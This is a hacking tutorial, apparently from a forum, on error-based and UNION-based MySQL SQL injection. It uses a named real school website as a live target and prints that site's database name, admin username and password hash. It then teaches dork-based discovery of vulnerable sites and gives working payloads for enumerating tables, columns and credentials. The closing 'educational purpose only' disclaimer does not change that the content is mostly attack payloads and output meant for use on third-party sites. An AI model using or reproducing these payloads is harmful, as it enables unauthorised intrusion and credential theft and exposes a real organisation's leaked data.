Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion

Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright now that we know what we need to extract, lets get our goods
As far as what we're injected in the site, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord

Here's what the query will look like first (for extracting data):

Code:

and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Variables:
table_name.column_name: Input the table name and column name you want to extract information from

database_name.table_name: Input the database name and table name you want to extract information from

LIMIT Function: Increment until you find the data you need

So here's what our address is gonna look like when we extract details from userName

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Code:

admim

Query for extracting details from passWord

Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Code:

86f574c1d63d53fa804c13c3213953d9

Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9

Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.

MySQLi UNION BASED

How to hack Website using SQL Injection with easy Steps.

After a long time it's my first tutorial on website hacking using
SQL Injection attack with easy and simple steps. I have seen many guys they can't understand SQL Injection method because it's really very hard to understand and Inject Malicious code into URL and get website Database, So here I created SQL Injection tutorial with easy steps and understandable, Hope you all will like it.

✔ What is SQL Injection ?

SQL Injection is one the most popular Web application hacking method. In SQL Injection an attacker find website vulnerability (Vulnerability means Weakness point of website) and Inject Malicious code into URL and get Database of Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation.
Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

✔ Requirements :-
SQL Injection Dorks. (Click to download) Skip ad's after 5 Sec
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on. (Click to download Hackbar add-on)
Little bit understanding of SQL Injection and URL
Fresh Mind to Understand it.

✔ Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)

Click here to download Huge list of SQL Injection Dorks
Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Basically I always use Google to search Vulnerable websites.

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites, the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=

Yeah, Definitely it will have because this all website having DB and SQL Injection String and related to SQL Injection Dorks.

For Eg. www.targetwebsite.com/index.php?id=8

✔ How to Check for Vulnerability.
Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note :- To Check the Vulnerability put sigle Quote ( ' ) at the end of the website URL and Hit Enter.
For Eg. www.targetwebsite.com/index.php?id=2'
If the page remains same or Not found then it's not vulnerable and if the page shows Error like this :-

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

This means the website is vulnerable to SQL Injection.

✔ Step 2. Find the number of Columns.

Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in the Database.

To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"

For Example :- Change it's Order By 1,2,3,4 like below :-

www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5

And Suppose above Method won't work then use below method :-

www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--

If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this :-

An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.
www.targetwebsite.com/index.php?id=8 Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 12 (Error)

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB.

So now here I found number of columns in my DB :-

Number of Columns = 11

✔ Step 3. Find the Vulnerable Column.
Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column.

Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence".

And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.

For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--And Suppose above Method won't work then use below method:-www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--

✔ And Once if the Query has been Executed then it will display the number of Column. smile emoticon Yeahh.... !!

In the Above result, I found three vulnerable Columns 2,3 and 4.

let take 2 as our tutorial.
Well... ! We found Vulnerable Columns, Now Next Step.
✔Step 4. Finding version, Database and User.
Now this time to find out website Database version and User
Just replace Vulnerable Column no. with "version()"

For Eg.

www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter : and you will get result.

Now again do the same replace Vulnerable column with different query like :- database(), user()For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--

And Suppose above Method won't work then use below method :-

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔ Step 5. Finding the Table name.
Here we found vulnerable Column, DB Version name and User it's time to get Table name.
If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)

Let us find now Table name of the Database, Same here Replace Vulnerable Column number with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Now hit Enter and you can see Complete Table of Database.

(Click on Image to Enlarge it)

Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :- userDatabase. Let us choose that table userdatabase and Go on Next step.
✔ Step 6. Finding the Column name.
Now same to find Column names, replace "group_concat(table_name) with "group_concat(column_name)"
and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=0xhex--

To convert table to hex .. Goto this link http://adf.ly/1KthYn

www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=0x61646d696e--

And Now Hit Enter and you will be able to see the Column names like this :-
(Click on Image to Enlarge it)

Great Here we found Username and Password Column grin emoticon.

✔ Step 7. Explore Database & Hack it.
Cool......! now you know the next step what to do grin emoticon..... get the ID and Password of Admin user using this Command into URL.Now replace group_concat(column_name) with group_concat(username,0x2a,password). or any other Column name you want to get Data.

For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.

Now find Admin page using this Method :- How to hack website using Havij.

Disclaimer:- The Above tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

Best of Luck

#D4RK 4NG31